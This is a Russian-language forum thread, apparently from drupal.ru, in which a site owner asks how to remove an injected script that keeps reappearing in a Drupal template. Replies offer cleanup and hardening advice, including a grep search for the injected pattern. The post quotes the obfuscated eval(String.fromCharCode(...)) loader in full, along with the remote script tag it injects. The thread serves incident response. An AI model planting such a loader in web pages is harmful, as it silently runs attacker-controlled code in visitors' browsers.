24 апреля 2018 в 12:33
в файл html.tpl.php
встраивается вот такой скрипт
<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 46, 108, 111, 99, 97, 108, 115, 116, 111, 114, 97, 103, 101, 46, 116, 107, 47, 115, 46, 106, 115, 63, 99, 114, 116, 61, 110, 101, 119, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));</script>
который генерирует в head js вставку,
<script type="text/javascript" src="https://js.localstorage.tk/s.js?crt=new"></script>
подскажите чем, лечить, может быть кто сталкивался.
сам код удалял. но через какой то время он появляется снова.
Комментарии
Лечить руками или заказывать лечение.
Нужно удалить вредоносный код из файлов и почистить базу.
Основной метод борьбы - своевременные обновления.
Хотя не исключён вариант утечки паролей или иных вариантов пролезть на хостинг.
Чистка базы включает в себя, грубо говоря, поиск по совпадениям и удаление найденных?
Ищите пхп-код, там где его не должно быть, странные вставки JS-кода.
Посмотрите этот комментарий и другие в том топике https://drupal.ru/node/136662#comment-710811
Лечение сайта после заражения - это сложный и кропотливый процесс. Готов помочь вам с лечением, пишите в личку.
Не забудьте проверить пользователей с админскими правами, права пользователей вообще, а также на всякий сменить все админские пароли, а лучше вообще все пароли.
поищите по строке
grep -rwn /var/www/ -e 'eval(String.fromCharCode'